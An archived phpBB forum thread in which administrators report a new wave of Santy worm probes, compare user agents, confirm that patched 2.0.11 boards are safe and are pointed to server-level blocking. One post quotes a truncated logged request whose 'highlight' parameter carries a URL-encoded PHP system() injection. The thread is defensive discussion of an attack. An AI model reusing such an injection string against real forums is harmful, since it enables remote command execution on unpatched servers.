Um, santy is back?

The 2.0.x discussion forum has been locked; this will remain read-only. The 3.0.x discussion forum has been renamed phpBB Discussion.
Locked
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Um, santy is back?

Post by Hynee »

About an hour ago a user on my forum pointed out that their were 130 guests on our board, and sure enough, they were the usual:

/forum/viewtopic.php?t=546&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(

The user agent is always a simple "Mozilla/4.0", not your typical real browser string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", and not the user agent the Christmas santy used (LWP::Simple or lwp-trivial). They've obviously changed this, because that made it easy to catch.

They're coming from all sorts of hosts. Anyway, is it back?
fumbalah
Registered User
Posts: 2000
Joined: Sat Jan 24, 2004 3:02 pm
Location: Lexington, Kentucky
Contact:

Post by fumbalah »

What version of phpBB are you running. The worm is still going around somewhat, trying to exploit forums, as long as you are patched, you should be fine.
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Post by Hynee »

We're fine, we're at v2.0.11. Just a lot of hits, hasn't slowed us really.
tristatesportbikes
Registered User
Posts: 14
Joined: Tue Jun 15, 2004 12:54 am

hits

Post by tristatesportbikes »

We were hit with over 500 guests and it didn't slow it down at all. The patches seem to be working fine. put the patch in the config.php file and guests dropped down to normal.

We are at a heavily modded board that is at 2.0.6 with all of the security patches from then to 2.0.11
G.A. Heath
Registered User
Posts: 2
Joined: Tue Jan 25, 2005 2:32 am

Post by G.A. Heath »

I have to agree that this is a new flavor of sanity. My site is small, but we have noticed the activity and my logs are similar to what Hynee has mentioned.
mdecatur
Registered User
Posts: 2
Joined: Fri Dec 24, 2004 9:56 pm

Post by mdecatur »

We're getting slaughtered, hundreds of guests and our board is crawling. We're at 2.0.11 though, so security is a nonissue. Is there a way to ban the hosts that try to execute this specific URL string automatically?
User avatar
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Post by AdamR »

You can block the attacks at the "server" level before it even gets to the phpBB files. See this link for information:
http://www.phpbb.com/phpBB/viewtopic.php?t=249010

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton
Locked

Return to “2.0.x Discussion”